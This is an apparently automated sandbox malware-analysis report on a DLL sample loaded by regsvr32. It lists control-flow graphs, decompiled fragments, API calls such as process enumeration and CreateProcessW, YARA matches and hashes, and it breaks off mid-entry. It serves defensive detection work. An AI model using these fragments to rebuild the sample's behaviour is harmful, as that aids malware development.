                                                                                            control_flow_graph 282 737d6c-737d9a 283 737d9c-737da4 282->283 284 73804a-7380a9 call 74a474 283->284 285 737daa-737dad 283->285 294 7380b5 284->294 295 7380ab-7380b0 284->295 287 737db3-737db9 285->287 288 737ff4-738045 call 746048 285->288 290 737f53-737fef call 74fdcc 287->290 291 737dbf-737dc5 287->291 288->283 290->283 296 737dcb-737ec1 call 74bb78 291->296 297 7380ba-7380c0 291->297 294->297 295->283 303 737ec6-737ecc 296->303 300 737f40-737f52 297->300 301 7380c6 297->301 301->283 304 737edf-737f3b call 748f30 303->304 305 737ece-737ed5 303->305 304->300 305->304
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                            • API String ID: 0-308291206
                                                                                            • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                            • Instruction ID: 56241bcc6ca1c12db65d8080260bbe225d900293cca06beb0e04a1d44b4ba830
                                                                                            • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                            • Instruction Fuzzy Hash: 4D912AB150074A8BEB58CF28C88A4DE3FA1FB58358F65422CFC4AA6290D778D595CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A000 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 307 74a000-74a0cc call 749f38 call 742404 312 74a0d2-74a16a call 749424 307->312 313 74a22c-74a243 307->313 315 74a16f-74a227 call 74c2c0 312->315 315->313
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /Q$;$F8$KT$F$Z
                                                                                            • API String ID: 0-1951868783
                                                                                            • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                            • Instruction ID: fdd1122faef2d0261e4c4dd121ff5d067f6eacde0ef3a443f4b52587e5093afe
                                                                                            • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                            • Instruction Fuzzy Hash: BE6147B1E147098FCB48CFA8D88A8DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 37%
                                                                                            			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}











                                                                                            0x180010ac0
                                                                                            0x180010ac5
                                                                                            0x180010ac9
                                                                                            0x180010ad6
                                                                                            0x180010adf
                                                                                            0x180010ae1
                                                                                            0x180010aeb
                                                                                            0x180010af2
                                                                                            0x180010afa
                                                                                            0x180010b02
                                                                                            0x180010b0b
                                                                                            0x180010b1b
                                                                                            0x180010b22

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                            • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                            • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                            • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073CC14 Relevance: 4.1, Strings: 3, Instructions: 312COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 331 73cc14-73cc36 332 73cc40 331->332 333 73cc42-73cc48 332->333 334 73cfbb-73d136 call 75826c call 731718 333->334 335 73cc4e-73cc54 333->335 348 73d138 334->348 349 73d13d-73d314 call 731718 call 751ac4 334->349 337 73cfb1-73cfb6 335->337 338 73cc5a-73cc60 335->338 337->333 340 73cc66-73cc73 338->340 341 73d31f-73d325 338->341 344 73ccb0-73cccb 340->344 345 73cc75-73ccae 340->345 341->333 342 73d32b-73d338 341->342 347 73ccd5-73cf8f call 738870 call 731718 call 751ac4 344->347 345->347 361 73cf94-73cf9c 347->361 348->349 349->332 359 73d31a 349->359 359->341 361->342 362 73cfa2-73cfac 361->362
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0c$\$c2&
                                                                                            • API String ID: 0-1001447681
                                                                                            • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                            • Instruction ID: 4438beab00c766664f2a7a08f5d8d0be7321fec4d5e8c1abafd51a44c14f67a2
                                                                                            • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                            • Instruction Fuzzy Hash: AE02E6715083C8CBEBBECF64C889ADA7BADFB44708F10521DEA4A9E258DB745744CB41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00738BC8 Relevance: 4.0, Strings: 3, Instructions: 213COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 363 738bc8-738c26 call 749f38 366 738c2b-738c30 363->366 367 738c36-738c3b 366->367 368 738e8a-738e9a call 732c08 366->368 369 738c41-738c43 367->369 370 738e7b-738e85 367->370 377 738ea6 368->377 378 738e9c-738ea1 368->378 372 738c49-738c4e 369->372 373 738eb8-738f90 call 74c2c0 369->373 370->366 375 738d71-738e5f call 7452c0 372->375 376 738c54-738c59 372->376 384 738f95-738fad 373->384 385 738e64-738e6b 375->385 381 738d10-738d6a call 748d60 376->381 382 738c5f-738c64 376->382 383 738ea8-738ead 377->383 378->366 391 738d6f Process32FirstW 381->391 382->383 386 738c6a-738d0b call 74bf94 382->386 383->384 387 738eb3 383->387 385->384 389 738e71-738e76 385->389 386->366 387->366 389->366 391->375
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .f$M$N5
                                                                                            • API String ID: 0-1477915503
                                                                                            • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                            • Instruction ID: f4506d7bcbb1492cdaab79765df4767828b70e7821b7a9aaf5ca2d70049259d9
                                                                                            • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                            • Instruction Fuzzy Hash: FEA160705197449FD7E8DF28C8C959EBBE0FB94304F906A1DF8869B2A0CB78D945CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00748FC8 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 415 748fc8-748ff9 call 749f38 418 749000 415->418 419 749005-74900b 418->419 420 749354-7493f0 call 74464c 419->420 421 749011-749017 419->421 429 7493f5 420->429 423 749134-749235 call 74eac0 call 751684 421->423 424 74901d-749023 421->424 436 74923a-74934f call 7387dc 423->436 426 749029-74902b 424->426 427 74912a-74912f 424->427 430 749031-749125 call 7449b0 426->430 431 7493fa-749400 426->431 427->419 429->431 430->418 431->419 433 749406-749421 431->433 436->429
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A]jN
                                                                                            • API String ID: 0-1761522205
                                                                                            • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                            • Instruction ID: 5df0604ba80eb93bfca29cca2a312bd627ddd7579ff9d377ea3875bf63aba9b3
                                                                                            • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                            • Instruction Fuzzy Hash: C6D1E4B1D0060A8FDF48DFA8C48A4AEBBB1FB58304F11422DD516BB290D7785A46CFD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C
                                                                                            • API String ID: 0-3705061908
                                                                                            • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                            • Instruction ID: d28a233f248adf134e37d9b1b03e47c63eababc583530b4d5471050845282a3d
                                                                                            • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                            • Instruction Fuzzy Hash: E461D27151C7848BD768DF28C18A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 134 18000147c-180001482 135 180001484-180001487 134->135 136 1800014bd-1800014c7 134->136 137 1800014b1-1800014f0 call 180001268 135->137 138 180001489-18000148c 135->138 139 1800015e4-1800015f9 136->139 157 1800014f6-18000150b call 1800010fc 137->157 158 1800015be 137->158 140 1800014a4 __scrt_dllmain_crt_thread_attach 138->140 141 18000148e-180001491 138->141 142 180001608-180001622 call 1800010fc 139->142 143 1800015fb 139->143 149 1800014a9-1800014b0 140->149 145 180001493-18000149c 141->145 146 18000149d-1800014a2 call 1800011ac 141->146 155 180001624-180001659 call 180001224 call 180001e54 call 180001ed0 call 1800013d8 call 1800013fc call 180001254 142->155 156 18000165b-18000168c call 180001c48 142->156 147 1800015fd-180001607 143->147 146->149 155->147 168 18000169d-1800016a3 156->168 169 18000168e-180001694 156->169 166 180001511-180001522 call 18000116c 157->166 167 1800015d6-1800015e3 call 180001c48 157->167 161 1800015c0-1800015d5 158->161 184 180001573-18000157d call 1800013d8 166->184 185 180001524-180001541 call 180001e94 call 180001e44 call 180001e70 call 180006da0 166->185 167->139 174 1800016a5-1800016af 168->174 175 1800016ea-1800016f2 call 180010ac0 168->175 169->168 173 180001696-180001698 169->173 180 18000178b-180001798 173->180 181 1800016b1-1800016b9 174->181 182 1800016bb-1800016c9 174->182 186 1800016f7-180001700 175->186 187 1800016cf-1800016d7 call 18000147c 181->187 182->187 196 180001781-180001789 182->196 184->158 206 18000157f-18000158b call 180001e8c 184->206 232 180001546-180001548 185->232 192 180001702-180001704 186->192 193 180001738-18000173a 186->193 198 1800016dc-1800016e4 187->198 192->193 201 180001706-180001728 call 180010ac0 call 1800015e4 192->201 202 180001741-180001756 call 18000147c 193->202 203 18000173c-18000173f 193->203 196->180 198->175 198->196 201->193 229 18000172a-18000172f 201->229 202->196 216 180001758-180001762 202->216 203->196 203->202 223 1800015b1-1800015bc 206->223 224 18000158d-180001597 call 180001340 206->224 221 180001764-18000176b 216->221 222 18000176d-18000177d 216->222 221->196 222->196 223->161 224->223 233 180001599-1800015a7 224->233 229->193 232->184 234 18000154a-180001551 __scrt_dllmain_after_initialize_c 232->234 233->223 234->184 235 180001553-180001570 call 180006d5c 234->235 235->184
                                                                                            C-Code - Quality: 100%
                                                                                            			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}




                                                                                            0x180001480
                                                                                            0x180001482
                                                                                            0x180001487
                                                                                            0x18000148c
                                                                                            0x180001491
                                                                                            0x18000149c

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                            • String ID:
                                                                                            • API String ID: 190073905-0
                                                                                            • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                            • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                            • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                            • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                            • SetLastError.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2506987500-0
                                                                                            • Opcode ID: ab2f879cb807edc10122b4a103df6ae5f6bd6816ec7a20867b12153a3a924da4
                                                                                            • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                            • Opcode Fuzzy Hash: ab2f879cb807edc10122b4a103df6ae5f6bd6816ec7a20867b12153a3a924da4
                                                                                            • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00743988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 393 743988-743a3e call 749f38 396 743a44-743ac6 call 73a940 393->396 397 743acc-743b12 CreateProcessW 393->397 396->397
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID: li
                                                                                            • API String ID: 963392458-3170889640
                                                                                            • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                            • Instruction ID: 86f07da87f41df90cffaf3c3b8b29052b3c79bb328378359c1584c532f3adb22
                                                                                            • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                            • Instruction Fuzzy Hash: CC41E57091CB848FDBA4DF18D08979AB7E0FB98315F20495DE48CC7296CB789884CB86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 400 180008714-180008723 401 180008733-180008743 400->401 402 180008725-180008731 400->402 404 18000875a-180008772 RtlAllocateHeap 401->404 402->401 403 180008776-180008781 call 1800086f4 402->403 410 180008783-180008788 403->410 405 180008774 404->405 406 180008745-18000874c call 18000c08c 404->406 405->410 406->403 412 18000874e-180008758 call 18000abf8 406->412 412->403 412->404
                                                                                            C-Code - Quality: 44%
                                                                                            			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}






                                                                                            0x180008714
                                                                                            0x180008723
                                                                                            0x180008727
                                                                                            0x180008727
                                                                                            0x180008731
                                                                                            0x18000873f
                                                                                            0x180008743
                                                                                            0x18000874c
                                                                                            0x180008758
                                                                                            0x180008769
                                                                                            0x180008772
                                                                                            0x180008774
                                                                                            0x180008776
                                                                                            0x18000877b
                                                                                            0x180008788

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                            • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                            • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                            • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 440 180010a8e-180010aae ExitProcess call 180014c90 442 180010ab3-180010ab9 440->442
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 80118013-0
                                                                                            • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                            • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                            • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                            • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3252650109-0
                                                                                            • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                            • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                            • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                            • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3140674995-0
                                                                                            • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                            • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                            • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                            • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 65%
